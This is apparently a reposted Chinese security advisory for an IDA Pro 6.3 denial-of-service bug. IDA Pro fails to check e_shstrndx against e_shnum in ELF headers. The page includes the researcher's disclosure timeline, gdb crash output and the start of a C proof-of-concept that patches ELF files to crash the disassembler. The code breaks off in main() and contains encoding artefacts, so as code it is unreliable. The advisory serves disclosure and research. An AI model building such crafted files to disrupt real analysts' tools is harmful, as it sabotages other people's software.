IDA Pro 'ELF'文件远程拒绝服务漏洞

发布日期:2012-12-20
更新日期:2012-12-22

受影响系统:
Hex-Rays IDA Pro 6.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57004

IDA PRO简称IDA(Interactive Disassembler)是交互式反汇编工具。

错误流程存在于IDA Pro对EFL文件中的ELF Header的处理,EFL Header中存在e_shnum和e_shstrndx这两个域,前者表示Section header table中包含元素的个数,后者是Section header table中元素的索引。IDA Pro在使用索引e_shstrndx来引用Section header table中元素之前,没有验证索引值e_shstrndx是否大于e_shnum,从而造成访问越界。攻击者可以构造一个e_shstrndx大于e_shnum的恶意ELF文件,诱骗受害者点击恶意文件来进行攻击。该漏洞可以造成受害者受影响应用程序崩溃,可能造成代码执行(未得到确认)。

<*来源:Alejandro HernAindez (nitrousenador@gmail.com)
 
  链接:
       
       
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
*
* IDA Pro 6.3 (crash due an internal error)
* ELF anti-debugging/reversing patcher
*
* Published @ IOActive Labs Research blog:
*
*
* - nitr0us [ ]
*
* Tested under:
* IDA Pro Starter License 6.3.120531 (Mac OS X)
* IDA Pro Demo            6.3.120730 (Ubuntu Linux 9.04)
* IDA Pro Demo            6.3.120730 (Mac OS X 10.7.3)
* IDA Pro Demo            6.3.120730 (Windows Vista Home Premium SP2)
*
* Bug found using Frixyon fuzzer (my ELF file format fuzzer still in develo=
pment)
*
* Timeline:
* 21/11/2012    The bug was found on IDA Demo 6.3
* 22/11/2012    The bug was tested on IDA Pro Starter License 6.3.120531 (3=
2-bit)
* 22/11/2012    The bug was reported through the official Hex-Rays contact =
emails
* 23/11/2012    Hex-Rays replied and agreed that the bug leads to an unreco=
verable
*              state and it will be fixed on the next release
*
**************** TECHNICAL DETAILS ***********************
nitr0us@burial:~$ gdb -q idaq
(gdb) r a.out
(no debugging symbols found)

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=3D@0xbfbffae0,
    notif=3Dreader_t::err_shstrndx) at reader.cpp:33
33      reader.cpp: No such file or directory.
        in reader.cpp
Current language:  auto; currently c++
(gdb)

The root cause of the problem is that there's no validation to
verify if e_shstrndx > e_shnum before referencing it.

**********************************************************
*
* [Compilation] $ gcc ida_63_elf_shield.c -o ida_63_elf_shield -Wall
*
* Sh0utz: IOActive fellows, CRAc, b33rc0n crew (dex, hkm, calderpwn,
*        Carlos Ayala, Daemon [Thanks for test it on IDA paid $$$],=20
*        LightOS) chr1x, alt3kx, tr3w, crypkey, el_chito, nahual, beck,=20
*        sirdarkcat, NataS, ran, Fede Bossi, nediam, psymera, Rolman,=20
*        Kbrown, Bucio, p4dm3, Hector Lopez, zeus, Matias Brutti,
*        sunl3vy, Raaka_elgaupo, vendetta, raito, beavis, el5patas,=20
*        vi0let.
*
*
*
*
*
*/

#include <sys/mman.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <time.h>

#define EI_NIDENT      16
#define ELFCLASS32      1              /* 32-bit objects */
#define ELFDATA2LSB    1              /* 2's complement, little endian */

const char e_magic[4] =3D { 0x7f, 'E', 'L', 'F' };

typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Off;

typedef struct
{
  unsigned char e_ident[EI_NIDENT];    /* Magic number and other info */
  Elf32_Half    e_type;                /* Object file type */
  Elf32_Half    e_machine;              /* Architecture */
  Elf32_Word    e_version;              /* Object file version */
  Elf32_Addr    e_entry;                /* Entry point virtual address */
  Elf32_Off    e_phoff;                /* Program header table file offset=
*/
  Elf32_Off    e_shoff;                /* Section header table file offset=
*/
  Elf32_Word    e_flags;                /* Processor-specific flags */
  Elf32_Half    e_ehsize;              /* ELF header size in bytes */
  Elf32_Half    e_phentsize;            /* Program header table entry size =
*/
  Elf32_Half    e_phnum;                /* Program header table entry count=
*/
  Elf32_Half    e_shentsize;            /* Section header table entry size =
*/
  Elf32_Half    e_shnum;                /* Section header table entry count=
*/
  Elf32_Half    e_shstrndx;            /* Section header string table inde=
x */
} Elf32_Ehdr;

int isELF(int fd);

int main(int argc, char **argv)
{
Elf32_Ehdr*header;
Elf32_Halfnew_shnum;
Elf32_Halfnew_shstrndx;
intfd;

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygjyg.html